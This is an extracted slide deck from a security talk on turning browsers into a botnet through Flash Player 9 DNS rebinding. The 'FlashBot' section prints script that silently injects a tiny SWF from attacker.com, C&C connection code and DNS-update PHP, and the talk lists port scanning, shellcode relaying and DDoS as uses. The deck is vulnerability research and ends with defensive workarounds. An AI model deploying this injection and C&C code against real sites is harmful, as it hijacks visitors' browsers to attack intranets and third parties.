Embed Size (px)
DESCRIPTION
This paper talks about how hackers can exploit Flash Player 9's weaknesses to build a botnet to launch malicous attacks against the intranets and the Internet
Citation preview
Zombilizing The Web Browers Via Flash Player 9
Thai N. Duong<thaidn AT gmail DOT com>
http://vnhacker.blogspot.com
OverviewOverview Flash Player 9 and its potential weaknesses
Socket class Breaking the same-origin policy using crossdomain.xml and
DNS Spoofing
Exploiting the weaknesses Introducing FlashBot Demo
Workarounds
Flash Player 9Socket class
Quote from Flash 9 documentation “The Socket class enables ActionScript code to make socket connections and
to read and write raw binary data. The Socket class is useful for working with servers that use binary protocols.”
Flash Player 9Socket class
Quote from Flash 9 documentation “The Socket class enables ActionScript code to make socket connections and
to read and write raw binary data. The Socket class is useful for working with servers that use binary protocols.”
Let's port nmap to ActionScript!
Flash Player 9Socket class
Quote from Flash 9 documentation “The Socket class enables ActionScript code to make socket connections and
to read and write raw binary data. The Socket class is useful for working with servers that use binary protocols.”
Let's port nmap to ActionScript!
Err wait, how about the same-origin policy?
Same-Origin Policy
originally released with Netscape Navigator 2.0 and has been incorporated into every major browser since
prevents a document or script loaded from one site of origin from manipulating properties of or communicating with a document loaded from another site of origin
origin = domain name + port + protocol
Same-Origin Policy
Flash Player 9Same-Origin Policy
Breaking the SOP: crossdomain.xml
A SWF file from a.com may read from the server at b.com (using the Socket class, for example) if b.com has a cross-domain policy file that permits access from a.com (or from all domains).
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain=”*” to-ports=”*” />
</cross-domain-policy>
Yahoo! - http://api.search.yahoo.com/crossdomain.xml
YouTube - http://www.youtube.com/crossdomain.xml
Amazon.com - http://www.amazon.com/crossdomain.xml
DNS Pinning Explained same-origin policy
origin = domain name + port + protocol
DNS Pinning Explained same-origin policy
origin = domain name + port + protocol DNS is not static, and host names could potentially
resolve to different addresses over the course of a browsing session. Dynamic DNS anybody?
Browsers use DNS pinning to prevent attackers from manipulating DNS timeouts to their advantage. DNS pinning means that once an address is returned for a host name it is used for the duration of the browsing session, regardless of the DNS timeout associated with the domain
DNS Pinning same-origin policy
origin = domain name + port + protocol DNS is not static, and host names could potentially
resolve to different addresses over the course of a browsing session.
Browsers use DNS pinning to prevent attackers from manipulating DNS timeouts to their advantage. DNS pinning means that once an address is returned for a host name it is used for the duration of the browsing session, regardless of the DNS timeout associated with the domain
fact: Flash Player does not pin DNS at all.
Breaking the SOP: DNS Spoofing 1) The user loads a SWF file from
www.attacker.com and performs a DNS lookup for that hostname receiving 222.222.222.222 with a TTL of one second.
Breaking the SOP: DNS Spoofing1) The user loads a SWF file from
www.attacker.com and performs a DNS lookup for that hostname receiving 222.222.222.222 with a TTL of one second.
2) ActionScript in the SWF file tells the Flash Player to connect back to www.attacker.com after two seconds, shortly after the TTL expired.
Breaking the SOP: DNS Spoofing1) The user loads a SWF file from
www.attacker.com and performs a DNS lookup for that hostname receiving 222.222.222.222 with a TTL of one second.
2) ActionScript in the SWF file tells the Flash Player to connect back to www.attacker.com after two seconds, shortly after the TTL expired.
3) Since the DNS is not longer valid, the user's Flash Player connects to the DNS server to ask where www.attacker.com is now located.
Breaking the SOP: DNS Spoofing 1) The user loads a SWF file from
www.attacker.com and performs a DNS lookup for that hostname receiving 222.222.222.222 with a TTL of one second.
2) ActionScript in the SWF file tells the Flash Player to connect back to www.attacker.com after two seconds, shortly after the TTL expired.
3) Since the DNS is not longer valid, the user's Flash Player connects to the DNS server to ask where www.attacker.com is now located.
4) The DNS server, controlled by attackers, responds with 111.111.111.111, which points to www.example.com.
Breaking the SOP: DNS Spoofing 1) The user loads a SWF file from
www.attacker.com and performs a DNS lookup for that hostname receiving 222.222.222.222 with a TTL of one second.
2) ActionScript in the SWF file tells the Flash Player to connect back to www.attacker.com after two seconds, shortly after the TTL expired.
3) Since the DNS is not longer valid, the user's Flash Player connects to the DNS server to ask where www.attacker.com is now located.
4) The DNS server, controlled by attackers, responds with 111.111.111.111, which points to www.example.com
5) The SWF file located on www.attacker.com now has full access to www.example.com
FlashBot 101 an 130KB SWF file written in ActionScript 3.0 that
works on all web browsers supporting Flash Player 9 once loaded on victim web browsers, FlashBot can
leverage victim computers to execute commands received from a C&C server
commands that FlashBot understands: port scaning
socket relaying (i.e., to send shellcode)
launching web DDoS attacks
How FlashBot works FlashBot is secretly inserted into www.example.com via
JavaScript or iframe:
function source() {
return "http://" + Math.random().toString().substr(2) + "." + "attacker.com/flashbot.swf" ;
}
document.write('<object width="1" height="1">');
document.write('<embed src="' + source() + '" type="application/x-shockwave-flash" width="1" height="1">');
document.write('</embed></object>');
How FlashBot works Victim visits www.example.com to load FlashBot from
http://<random-subdomain>.attacker.com/flashbot.swf ActionScript in FlashBot connects back to the C&C server:
private function getCommand(subdomain:String, domain:String):void {
var cnc: String = "http://cnc" + "." + domain;
var connection:NetConnection = new NetConnection();
connection.connect(cnc + "/flashservices/gateway.php");
connection.call("FlashBot.getCommand", responder, subdomain, domain);
}
How FlashBot works C&C server sends to FlashBot a command which is
associated with a target IP address C&C server automatically updates the DNS server (powered
by PowerDNS) to map the subdomain of victim to the target IP address:
$query = "SELECT 1 FROM records WHERE name = '$record_name'";
$result = mysql_query($query);
if ( mysql_num_rows($result) ) {
$query = "UPDATE records SET content='$ip' WHERE name='$record_name'";
}
else {
$query = "INSERT INTO records VALUES (NULL, 2, '$record_name', 'A', '$ip', '6', NULL, NULL)";
}
How FlashBot works ActionScript in FlashBot waits for the DNS information
expires:
timer1 = new Timer( 10 * 1000, 1 );
timer1.addEventListener( TimerEvent.TIMER, exeCommand );
timer1.start(); FlashBot executes the command, and (optionally) sends the
result back to C&C then to start over the whole process.
Show Time!- set your DNS server to 221.133.4.24
- start Wireshark to see what you send out!
Demo 1: port scanning
works on Firefox scan 127.0.0.1 scan all other hosts in the same subnet with the victim
http://www.example.com/scanport.html
Demo 2: socket relaying
works on all browsers supporting Flash Player 9 relay socket connection to any IP address in the intranets
and the Internet can be used to send shellcodes, spam mails, launch DDoS
attacks
http://www.example.com/relay.html
Workarounds disable Flash Player (and all other plugins) in your web
browser. still want to watch youtube.com? use Firefox + NoScript +
FlashBlock restrict browser access to only port 80 and 443 using a
personal firewall
Thanks DAB Security Team VNSecurity Team, esp. rd and aquynh http://christ1an.blogspot.com http://www.jumperz.net theresacow: I own you a hug ;).
Zombilizing The Web Browers Via Flash Player 9
Thank you!
Questions/Comments?
Thai N. Duong
